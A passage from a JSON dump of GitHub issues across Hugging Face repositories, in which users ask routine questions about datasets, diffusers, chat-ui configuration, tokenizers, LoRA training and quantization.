"P2" ], "created_at": "2023-10-11T08:07:53Z", "updated_at": "2024-02-02T17:18:50Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6292, "title": "how to load the image of dtype float32 or float64", "body": "_FEATURES = datasets.Features(\r\n {\r\n \"image\": datasets.Image(),\r\n \"text\": datasets.Value(\"string\"),\r\n },\r\n)\r\nThe datasets builder seems only support the unit8 data. How to load the float dtype data? ", "url": "https://github.com/huggingface/datasets/issues/6292", "state": "open", "labels": [], "created_at": "2023-10-11T07:27:16Z", "updated_at": "2023-10-11T13:19:11Z", "user": "wanglaofei" }, { "repo": "huggingface/optimum", "number": 1442, "title": "Steps to quantize Llama 2 models for CPU inference", "body": "Team,\r\n\r\ncould you please share the steps to quantize the Llama 2 models for CPU inference.\r\nWhen i followed the ORTModelForCasualLM, faced challenges stating token is 401 forbidden even though token passed.\r\nFor offline model faced issue something related to cannot load from local directory.\r\n\r\nPlease share steps.", "url": "https://github.com/huggingface/optimum/issues/1442", "state": "open", "labels": [ "question", "quantization" ], "created_at": "2023-10-11T05:32:58Z", "updated_at": "2024-10-15T16:19:59Z", "user": "eswarthammana" }, { "repo": "huggingface/dataset-viewer", "number": 1956, "title": "upgrade hfh to 0.18.0?", "body": "https://github.com/huggingface/huggingface_hub/releases/tag/v0.18.0", "url": "https://github.com/huggingface/dataset-viewer/issues/1956", "state": "closed", "labels": [ "question", "blocked-by-upstream", "dependencies", "P2" ], "created_at": "2023-10-10T12:33:04Z", "updated_at": "2023-11-16T11:47:04Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 5353, "title": "How to use FreeU in SimpleCrossAttnUpBlock2D?", "body": "I've tried to change your code in order to maintain SimpleCrossAttnUpBlock2D however it seems that shapes doesn't fit up. How can I do it? Thanks! \r\n \r\n```Traceback (most recent call last):\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/routes.py\", line 523, in run_predict\r\n output = await app.get_blocks().process_api(\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/blocks.py\", line 1437, in process_api\r\n result = await self.call_function(\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/blocks.py\", line 1109, in call_function\r\n prediction = await anyio.to_thread.run_sync(\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/to_thread.py\", line 33, in run_sync\r\n return await get_asynclib().run_sync_in_worker_thread(\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/_backends/_asyncio.py\", line 877, in run_sync_in_worker_thread\r\n return await future\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/_backends/_asyncio.py\", line 807, in run\r\n result = context.run(func, *args)\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/utils.py\", line 865, in wrapper\r\n response = f(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/app.py\", line 128, in generate\r\n image = pipe(image=input_image,\r\n File \"/usr/lib/python3.9/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/src/diffusions/kandinsky/pipeline_kandinsky_img2img_scheduler.py\", line 125, in __call__\r\n noise_pred = self.unet(\r\n File \"/usr/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/lib/python3.9/site-packages/diffusers/models/unet_2d_condition.py\", line 1020, in forward\r\n sample = upsample_block(\r\n File \"/usr/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/free_lunch_utils.py\", line 166, in forward\r\n hidden_states = torch.cat([hidden_states, res_hidden_states], dim=1)\r\nRuntimeError: Tensors must have same number of dimensions: got 3 and 4 ```\r\n", "url": "https://github.com/huggingface/diffusers/issues/5353", "state": "closed", "labels": [], "created_at": "2023-10-10T09:13:22Z", "updated_at": "2023-10-11T05:11:38Z", "user": "americanexplorer13" }, { "repo": "huggingface/computer-vision-course", "number": 25, "title": "Should we use safetensors?", "body": "I wondered if we should add an official recommendation to use the `safetensors` saving format wherever possible.\r\n\r\nBut I have to admit, that I'm not that familiar with it, so I don't know how much overhead it would be in cases where we cannot use a HF library like `transformers`.", "url": "https://github.com/huggingface/computer-vision-course/issues/25", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-09T19:38:39Z", "updated_at": "2023-10-11T20:50:32Z", "user": "johko" }, { "repo": "huggingface/tokenizers", "number": 1362, "title": "When decoding an English sentence with the 'add_prefix_space' parameter set to 'False,' how can I add spaces?", "body": "I train a tokenizer and set 'add_prefix_space' to 'False', How can I ensure that BBPE tokenizers correctly handle space division when decoding a sequence ?\r\n```\r\nnormalizer = normalizers.Sequence([NFC(), StripAccents()])\r\ntokenizer.normalizer = normalizer\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence(\r\n [Whitespace(), Punctuation(), Digits(individual_digits=True), UnicodeScripts(),\r\n ByteLevel(add_prefix_space=False, use_regex=True), ])\r\ntokenizer.decoder = decoders.ByteLevel(add_prefix_space=False, use_regex=True)\r\ntokenizer.post_processor = tokenizers.processors.ByteLevel()\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1362", "state": "closed", "labels": [], "created_at": "2023-10-09T16:19:43Z", "updated_at": "2023-10-30T14:25:24Z", "user": "enze5088" }, { "repo": "huggingface/dataset-viewer", "number": 1952, "title": "filter parameter should accept any character?", "body": "https://datasets-server.huggingface.co/filter?dataset=polinaeterna/delays_nans&config=default&split=train&where=string_col=\u0439\u043e\u043f\u0442\u0430&offset=0&limit=100\r\n\r\ngives an error\r\n\r\n```\r\n{\"error\":\"Parameter 'where' is invalid\"}\r\n```", "url": "https://github.com/huggingface/dataset-viewer/issues/1952", "state": "closed", "labels": [ "bug", "question", "P1" ], "created_at": "2023-10-09T13:59:20Z", "updated_at": "2023-10-09T17:26:15Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 495, "title": "Make the description customizable in the .env", "body": "I'd like to customize the description of chat-ui as marked below. But I can't find how to do it in your tutorial, README.md.\r\nIt would be highly appreciated if you assist.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/142883089/046d3926-ddef-4da8-87a7-8771db218976)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/495", "state": "closed", "labels": [ "enhancement", "good first issue", "front", "hacktoberfest" ], "created_at": "2023-10-09T13:57:32Z", "updated_at": "2023-10-13T13:49:47Z", "comments": 7, "user": "sjbpsh" }, { "repo": "huggingface/datasets", "number": 6287, "title": "map() not recognizing \"text\"", "body": "### Describe the bug\n\nThe [map() documentation](https://huggingface.co/docs/datasets/v2.14.5/en/package_reference/main_classes#datasets.Dataset.map) reads:\r\n`\r\nds = ds.map(lambda x: tokenizer(x['text'], truncation=True, padding=True), batched=True)`\r\n\r\nI have been trying to reproduce it in my code as:\r\n\r\n`tokenizedDataset = dataset.map(lambda x: tokenizer(x['text']), batched=True)`\r\n\r\nBut it doesn't work as it throws the error:\r\n\r\n> KeyError: 'text'\r\n\r\nCan you please guide me on how to fix it?\r\n\r\n\n\n### Steps to reproduce the bug\n\n1. `from datasets import load_dataset\r\n\r\ndataset = load_dataset(\"amazon_reviews_multi\")`\r\n\r\n2. Then this code: `from transformers import AutoTokenizer\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")`\r\n3. The line I quoted above (which I have been trying)\n\n### Expected behavior\n\nAs mentioned in the documentation, it should run without any error and map the tokenization on the whole dataset.\n\n### Environment info\n\nPython 3.10.2", "url": "https://github.com/huggingface/datasets/issues/6287", "state": "closed", "labels": [], "created_at": "2023-10-09T10:27:30Z", "updated_at": "2023-10-11T20:28:45Z", "comments": 1, "user": "EngineerKhan" }, { "repo": "huggingface/diffusers", "number": 5337, "title": "What is the function of `callback` in stable diffusion?", "body": "I am reading the source code for stable diffusion pipeline. I wonder what is the function of `callback`? How to use it? Is there an example?\r\n\r\nhttps://github.com/huggingface/diffusers/blob/29f15673ed5c14e4843d7c837890910207f72129/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L585C13-L585C21", "url": "https://github.com/huggingface/diffusers/issues/5337", "state": "closed", "labels": [ "stale" ], "created_at": "2023-10-09T06:02:13Z", "updated_at": "2023-11-16T15:05:20Z", "user": "g-jing" }, { "repo": "huggingface/open-muse", "number": 122, "title": "How to finetune the muse-512\uff1f", "body": "Thank you for your contributions to the open-source community. After testing your weights, we found that the fine-tuned muse-512 has made significant improvements in image quality. We are very interested in this and would like to know how you performed the fine-tuning on the model. For example, what dataset did you use for fine-tuning? Is it open-source? What are its characteristics? Once again, we appreciate your contributions to the open-source community.", "url": "https://github.com/huggingface/open-muse/issues/122", "state": "open", "labels": [], "created_at": "2023-10-09T05:00:54Z", "updated_at": "2023-10-09T05:00:54Z", "user": "jiaxiangc" }, { "repo": "huggingface/diffusers", "number": 5335, "title": "how to deploy locally as chinese gov has block huggingface?", "body": "### Describe the bug\n\ngot all the models ckpt safetensor, it still try to connect the /CompVis/stable-diffusion/main/configs/stable-diffusion/v1-infer\n\n### Reproduction\n\npipe = diffusers.StableDiffusionPipeline.from_single_file(base_model,\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n safety_checker=None,)\n\n### Logs\n\n_No response_\n\n### System Info\n\nPlatform: Win10\r\nPython version: 3.10.11\r\nPyTorch version (GPU?): 2.0.1+cu118\r\ndiffusers version: 0.16.1\r\nTransformers version: 4.26.0\r\nAccelerate version: 0.15.0\r\nxFormers version: not installed\r\nUsing GPU in script?: 3070\r\nUsing distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@yiyixuxu @DN6 @patrickvonplaten @sayakpaul @patrickvonplaten", "url": "https://github.com/huggingface/diffusers/issues/5335", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-09T01:55:44Z", "updated_at": "2024-01-17T10:44:31Z", "user": "Louis24" }, { "repo": "huggingface/chat-ui", "number": 485, "title": "chat-ui and TGI Connect Timeout Error", "body": "Hi, I used TGI as a backend for llama2, when I put TGI endpoints in chat-ui, TGI and chat-ui is in same mechine but it cannot connect. would you give me some suggestions? thank you!\r\n\r\nTGI work well.\r\n```shell\r\ncurl http://127.0.0.1:8081/generate_stream \\\r\n -X POST \\\r\n -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' \\\r\n -H 'Content-Type: application/json'\r\n \r\ndata:{\"token\":{\"id\":13,\"text\":\"\\n\",\"logprob\":-0.45239258,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":13,\"text\":\"\\n\",\"logprob\":-0.5541992,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2772,\"text\":\"De\",\"logprob\":-0.016738892,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":1022,\"text\":\"ep\",\"logprob\":-0.000002503395,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":6509,\"text\":\" learning\",\"logprob\":-0.026168823,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":30081,\"text\":\" \",\"logprob\":-0.08898926,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":29898,\"text\":\"(\",\"logprob\":-0.0023441315,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":15189,\"text\":\"also\",\"logprob\":-0.0006175041,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2998,\"text\":\" known\",\"logprob\":-0.000029087067,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":408,\"text\":\" as\",\"logprob\":-7.1525574e-7,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":30081,\"text\":\" \",\"logprob\":-0.0052261353,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":24535,\"text\":\"deep\",\"logprob\":-0.0019664764,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2281,\"text\":\" struct\",\"logprob\":-0.0007429123,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2955,\"text\":\"ured\",\"logprob\":-0.000027537346,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":6509,\"text\":\" learning\",\"logprob\":-0.000081300735,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":29897,\"text\":\")\",\"logprob\":-0.00006067753,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":338,\"text\":\" is\",\"logprob\":-0.00009846687,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":760,\"text\":\" part\",\"logprob\":-0.000022292137,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":310,\"text\":\" of\",\"logprob\":-3.5762787e-7,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":263,\"text\":\" a\",\"logprob\":-0.00013446808,\"special\":false},\"generated_text\":\"\\n\\nDeep learning (also known as deep structured learning) is part of a\",\"details\":null} \r\n```\r\n\r\nchat-ui **.env.local** MODELS config:\r\n\r\n```shell\r\nMODELS=`[\r\n{\r\n \"name\": \"Trelis/Llama-2-7b-chat-hf-function-calling\",\r\n \"datasetName\": \"Trelis/function_calling_extended\",\r\n \"description\": \"function calling Llama-7B-chat\",\r\n \"websiteUrl\": \"https://research.Trelis.com\",\r\n \"userMessageToken\": \"\",\r\n \"userMessageEndToken\": \" [/INST] \",\r\n \"assistantMessageToken\": \"\",\r\n \"assistantMessageEndToken\": \" [INST] \",\r\n \"chatPromptTemplate\" : \"[INST] <>\\nRespond in French to all questions\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8081/generate_stream\"\r\n }]\r\n }\r\n]` \r\n```\r\n\r\nerror message:\r\n\r\n```shell\r\n[vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n|- TypeError: fetch failed\r\n at fetch (/root/chat-ui/node_modules/undici/index.js:109:13)\r\n at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at runNextTicks (node:internal/process/task_queues:64:3)\r\n at process.processImmediate (node:internal/timers:447:9)\r\n at async getModelFile (file:///root/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///root/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///root/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///root/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n\r\n2:32:29 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.", "url": "https://github.com/huggingface/chat-ui/issues/485", "state": "closed", "labels": [ "support" ], "created_at": "2023-10-08T06:36:26Z", "updated_at": "2025-01-16T23:13:34Z", "comments": 8, "user": "ViokingTung" }, { "repo": "huggingface/transformers", "number": 26665, "title": "How to resume training from a checkpoint when training LoRA using deepspeed\uff1f", "body": "### System Info\n\n- `transformers` version: 4.34.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.28\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.2\r\n- Accelerate version: 0.21.0\r\n- Accelerate config: - compute_environment: LOCAL_MACHINE\r\n - distributed_type: DEEPSPEED\r\n - use_cpu: False\r\n - num_processes: 1\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - deepspeed_config: {'deepspeed_config_file': 'none', 'zero3_init_flag': False}\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n - dynamo_config: {'dynamo_backend': 'INDUCTOR', 'dynamo_mode': 'default', 'dynamo_use_dynamic': False, 'dynamo_use_fullgraph': False}\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@pacman100 @ArthurZucker @younesbelkada\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using deepspeed to train LoRA, I want to use the resume function of the trainer. The sample code is as follows:\r\n```python\r\ncausal_model = AutoModelForCausalLM.from_pretrained(model_pretrained_path_,\r\n config=config,\r\n trust_remote_code=True,\r\n low_cpu_mem_usage=self.params[\"low_cpu_mem_usage\"])\r\n\r\npeft = PEFT(config_path_or_data=peft_params)\r\ncausal_model = peft.get_peft_model(model=causal_model)\r\n\r\ntrainer = Seq2SeqTrainer(\r\n params=trainer_params,\r\n model=causal_model,\r\n tokenizer=tokenizer,\r\n train_dataset=train_dataset,\r\n data_collator=data_collator,\r\n eval_dataset=eval_dataset,\r\n compute_metrics=dataset_t.metric,\r\n )\r\n\r\ntrainer.train(resume_from_checkpoint=True)\r\n```\r\ndeepspeed config as follows:\r\n```json\r\n{\r\n \"fp16\": {\r\n \"enabled\": \"auto\",\r\n \"loss_scale\": 0,\r\n \"loss_scale_window\": 1000,\r\n \"initial_scale_power\": 16,\r\n \"hysteresis\": 2,\r\n \"min_loss_scale\": 1\r\n },\r\n \"bf16\": {\r\n \"enabled\": \"auto\"\r\n },\r\n \"zero_optimization\": {\r\n \"stage\": 2,\r\n \"cpu_offload\": false,\r\n \"allgather_partitions\": true,\r\n \"allgather_bucket_size\": 5e8,\r\n \"overlap_comm\": true,\r\n \"reduce_scatter\": true,\r\n \"reduce_bucket_size\": 5e8,\r\n \"contiguous_gradients\": true\r\n },\r\n \"gradient_accumulation_steps\": \"auto\",\r\n \"gradient_clipping\": \"auto\",\r\n \"steps_per_print\": 50,\r\n \"train_batch_size\": \"auto\",\r\n \"train_micro_batch_size_per_gpu\": \"auto\",\r\n \"wall_clock_breakdown\": false\r\n}\r\n```\r\n\n\n### Expected behavior\n\nRuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument state_steps in method wrapper_CUDA___fused_adamw_)", "url": "https://github.com/huggingface/transformers/issues/26665", "state": "closed", "labels": [], "created_at": "2023-10-08T03:51:00Z", "updated_at": "2024-01-06T08:06:06Z", "user": "Sakurakdx" }, { "repo": "huggingface/chat-ui", "number": 484, "title": "Rich text input for the chat bar?", "body": "Taking a nifty feature from the Claude API here, but models on HuggingChat or most models used with Chat UI, can process or fluently speak markdown. \r\n\r\nIt's pretty easy to take something like remarkable and turn Rich text, like titles, bolds and lists. \r\nIt's helpful for users to organize content, to be able to highlight things, or put items in lists.\r\n\r\nHope for a feature like this", "url": "https://github.com/huggingface/chat-ui/issues/484", "state": "open", "labels": [ "enhancement", "front" ], "created_at": "2023-10-07T19:25:45Z", "updated_at": "2023-10-09T00:20:09Z", "comments": 2, "user": "VatsaDev" }, { "repo": "huggingface/chat-ui", "number": 480, "title": "Porting through nginx on aws", "body": "I have this up and running with aws but it only works on localhost on my machine. How can use Nginx to port this to some address?", "url": "https://github.com/huggingface/chat-ui/issues/480", "state": "open", "labels": [ "support" ], "created_at": "2023-10-06T10:39:52Z", "updated_at": "2023-10-08T21:13:10Z", "comments": 0, "user": "Mr-Nobody1" }, { "repo": "huggingface/sentence-transformers", "number": 2330, "title": "How to make prediction in NLI", "body": "I can't make prediction in NLI task when run based file training_NLI. Can you help me?", "url": "https://github.com/huggingface/sentence-transformers/issues/2330", "state": "closed", "labels": [], "created_at": "2023-10-06T08:52:59Z", "updated_at": "2024-01-31T16:18:18Z", "user": "trthminh" }, { "repo": "huggingface/candle", "number": 1036, "title": "How to fine-tune large models?", "body": "Hello all,\r\n\r\nHow should I finetune a large model? Are there implementations like `peft` in Python for Candle? Specifically, how should I train a quantized, LoRA model? I saw [candle-lora](https://github.com/EricLBuehler/candle-lora), and plan to use that but do not know how to quantize a large model.", "url": "https://github.com/huggingface/candle/issues/1036", "state": "closed", "labels": [], "created_at": "2023-10-05T16:43:17Z", "updated_at": "2024-12-03T15:55:53Z", "user": "nullptr2nullptr" }, { "repo": "huggingface/trl", "number": 837, "title": "What is the loss mask for special tokens in SFFTrainer", "body": "### System Info\n\nlatest transformers\n\n### Who can help?\n\n@muellerzr and @pacman100\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm training with SFTTrainer and want to ensure that the model is including the loss on predicting an EOS token (< /s >).\r\n\r\nWhat is the default handling of special tokens for the loss computation in SFTTrainer? Can I change this?\r\n```\r\nfrom transformers import Trainer\r\nfrom trl import SFTTrainer\r\n\r\ntrainer = SFTTrainer(\r\n peft_config=config,\r\n dataset_text_field=\"text\",\r\n max_seq_length=context_length,\r\n tokenizer=tokenizer,\r\n model=model,\r\n train_dataset=data[\"train\"],\r\n eval_dataset=data[\"test\"],\r\n args=transformers.TrainingArguments(\r\n max_steps=60, # comment this out after the first time you run. This is for testing!\r\n num_train_epochs=epochs,\r\n output_dir=save_dir,\r\n evaluation_strategy=\"steps\",\r\n do_eval=True,\r\n per_device_train_batch_size=batch_size,\r\n gradient_accumulation_steps=4,\r\n per_device_eval_batch_size=batch_size,\r\n log_level=\"debug\",\r\n optim=\"paged_adamw_8bit\",\r\n save_steps=0.2,\r\n logging_steps=1,\r\n learning_rate=1e-4,\r\n eval_steps=0.2,\r\n fp16=True,\r\n max_grad_norm=0.3,\r\n warmup_ratio=0.03,\r\n lr_scheduler_type=\"linear\",\r\n ),\r\n callbacks=[logging_callback], # Add custom callback here\r\n)\r\nmodel.config.use_cache = False # silence the warnings. Please re-enable for inference!\r\ntrainer.train()\r\n```\r\nNote that in my dataset I have included EOS tokens where appropriate\n\n### Expected behavior\n\nThe output of my fine-tuning is not emitting EOS tokens, which leads me to believe that the loss mask is zero for special tokens with SFTTrainer, but I'm unsure if that's true.", "url": "https://github.com/huggingface/trl/issues/837", "state": "closed", "labels": [], "created_at": "2023-10-05T13:49:52Z", "updated_at": "2023-11-13T18:23:54Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 476, "title": "Chat-ui failing on Edge, Chrome and Safari.", "body": "It seems to be working on Firefox for mac and Safari for iOS.\r\n\r\n\r\nStacktrace in console from Chrome:\r\n```\r\nFailed to load resource: the server responded with a status of 404 ()\r\nUrlDependency.4e6706f5.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nstores.6bc4a41f.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nchat.danskgpt.dk/:1 Uncaught (in promise) TypeError: Failed to fetch dynamically imported module: https://chat.danskgpt.dk/_app/immutable/entry/start.59a3223b.js\r\n_layout.svelte.e4398851.js:1 Failed to load resource: the server responded with a status of 404 ()\r\n_page.svelte.e0b7a273.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nLoginModal.fe5c7c4d.js:1 Failed to load resource: the server responded with a status of 404 ()\r\napp.1a92c8bc.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nwww.danskgpt.dk/chatui/favicon.png:1 Failed to load resource: the server responded with a status of 404 ()\r\n_error.svelte.00b004c8.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nwww.danskgpt.dk/chatui/favicon.svg:1 Failed to load resource: the server responded with a status of 404 ()\r\n```\r\n\r\nIt's hosted at [here](https://chat.danskgpt.dk).\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/476", "state": "closed", "labels": [ "support" ], "created_at": "2023-10-05T13:03:01Z", "updated_at": "2023-10-05T13:56:49Z", "comments": 4, "user": "mhenrichsen" }, { "repo": "huggingface/dataset-viewer", "number": 1929, "title": "Add a \"feature\" or \"column\" level for better granularity", "body": "For example, if we support statistics for a new type of columns, or if we change the way we compute some stats, I think that we don't want to recompute the stats for all the columns, just for one of them.\r\n\r\nIt's a guess, because maybe it's more efficient to have one job that downloads the data and computes every possible stats, than having N jobs that download the same data and compute only one stat. To be evaluated", "url": "https://github.com/huggingface/dataset-viewer/issues/1929", "state": "closed", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2023-10-05T08:24:50Z", "updated_at": "2024-02-22T21:24:09Z", "user": "severo" }, { "repo": "huggingface/huggingface.js", "number": 251, "title": "How to get SpaceRuntime information?", "body": "Inside hub library, I can see that there's `SpaceRuntime` which specify the hardware requirements. `SpaceRuntime` is defined inside `ApiSpaceInfo`.\r\n\r\nBut seems that it's not being emitted.\r\n\r\n```\r\n\t\tconst items: ApiSpaceInfo[] = await res.json();\r\n\r\n\t\tfor (const item of items) {\r\n\t\t\tyield {\r\n\t\t\t\tid: item._id,\r\n\t\t\t\tname: item.id,\r\n\t\t\t\tsdk: item.sdk,\r\n\t\t\t\tlikes: item.likes,\r\n\t\t\t\tprivate: item.private,\r\n\t\t\t\tupdatedAt: new Date(item.lastModified),\r\n\t\t\t};\r\n\t\t}\r\n```\r\n\r\nSo, is there anyway I can grab those information?", "url": "https://github.com/huggingface/huggingface.js/issues/251", "state": "closed", "labels": [], "created_at": "2023-10-04T18:23:42Z", "updated_at": "2023-10-05T08:26:07Z", "user": "namchuai" }, { "repo": "huggingface/chat-ui", "number": 471, "title": "Custom chatbot which includes sources such as pdf,databases and a specific website only.", "body": "I have a chatbot which can query pdf,database,a particular website in python.How do I include may be the quantized models,rag sources and the retrieval logic in this chat ui?", "url": "https://github.com/huggingface/chat-ui/issues/471", "state": "closed", "labels": [], "created_at": "2023-10-04T04:36:23Z", "updated_at": "2024-07-08T16:22:02Z", "comments": 2, "user": "pranavbhat12" }, { "repo": "huggingface/huggingface.js", "number": 250, "title": "How to apply pagination for listModels?", "body": "Thanks for the library!\r\n\r\nCould you please help me on how can I apply pagination for `listModels` API from @huggingface/hub?\r\n\r\nI don't know how to specify the offset.", "url": "https://github.com/huggingface/huggingface.js/issues/250", "state": "closed", "labels": [], "created_at": "2023-10-03T12:39:17Z", "updated_at": "2023-10-04T01:27:01Z", "user": "namchuai" }, { "repo": "huggingface/transformers.js", "number": 341, "title": "[Question] Custom stopping criteria for text generation models", "body": "Is it possible to pass a custom `stopping_criteria` to `generate()` method? Is there a way to interrupt generation mid-flight?", "url": "https://github.com/huggingface/transformers.js/issues/341", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-02T10:35:33Z", "updated_at": "2025-10-11T10:12:10Z", "user": "krassowski" }, { "repo": "huggingface/datasets", "number": 6273, "title": "Broken Link to PubMed Abstracts dataset .", "body": "### Describe the bug\n\nThe link provided for the dataset is broken,\r\ndata_files = \r\n[https://the-eye.eu/public/AI/pile_preliminary_components/PUBMED_title_abstracts_2019_baseline.jsonl.zst](url)\r\n\r\nThe \n\n### Steps to reproduce the bug\n\nSteps to reproduce:\r\n\r\n1) Head over to [https://huggingface.co/learn/nlp-course/chapter5/4?fw=pt#big-data-datasets-to-the-rescue](url)\r\n\r\n2) In the Section \"What is the Pile?\", you can see a code snippet that contains the broken link.\n\n### Expected behavior\n\nThe link should Redirect to the \"PubMed Abstracts dataset\" as expected .\n\n### Environment info\n\n.", "url": "https://github.com/huggingface/datasets/issues/6273", "state": "open", "labels": [], "created_at": "2023-10-01T19:08:48Z", "updated_at": "2024-04-28T02:30:42Z", "comments": 5, "user": "sameemqureshi" }, { "repo": "huggingface/chat-ui", "number": 466, "title": "Deploy with Langchain Agent", "body": "I have built a Langchain agent which interacts with Vicuna model hosted with TGI and the web UI is currently hosted with Gradio on Spaces. I'd like UI to be more polished(like huggingchat/chatgpt) with persistence. I couldn't find any docs related to how to use Langchain agent with chat-ui. If anyone could shed some light on this or point me towards the relevant resources.\r\n\r\nThank you for your help.", "url": "https://github.com/huggingface/chat-ui/issues/466", "state": "closed", "labels": [], "created_at": "2023-09-30T21:29:38Z", "updated_at": "2023-10-03T09:14:48Z", "comments": 1, "user": "Tejaswgupta" }, { "repo": "huggingface/accelerate", "number": 2018, "title": "A demo of how to perform multi-GPU parallel inference for transformer LLM is needed", "body": "In the current demo: \"[Distributed inference using Accelerate](https://huggingface.co/docs/accelerate/usage_guides/distributed_inference )\" , it is still not clear enough to know how to perform multi-GPU parallel inference for transformer LLM. This gap in the demo has hindered not just me, but also many people in adopting your solution: https://www.reddit.com/r/LocalLLaMA/comments/15rlqsb/how_to_perform_multigpu_parallel_inference_for/\r\nAlso in the reply, other frameworks have already started competing for this specific use case. \r\n\r\nCould you provide the demo for this use case? ", "url": "https://github.com/huggingface/accelerate/issues/2018", "state": "closed", 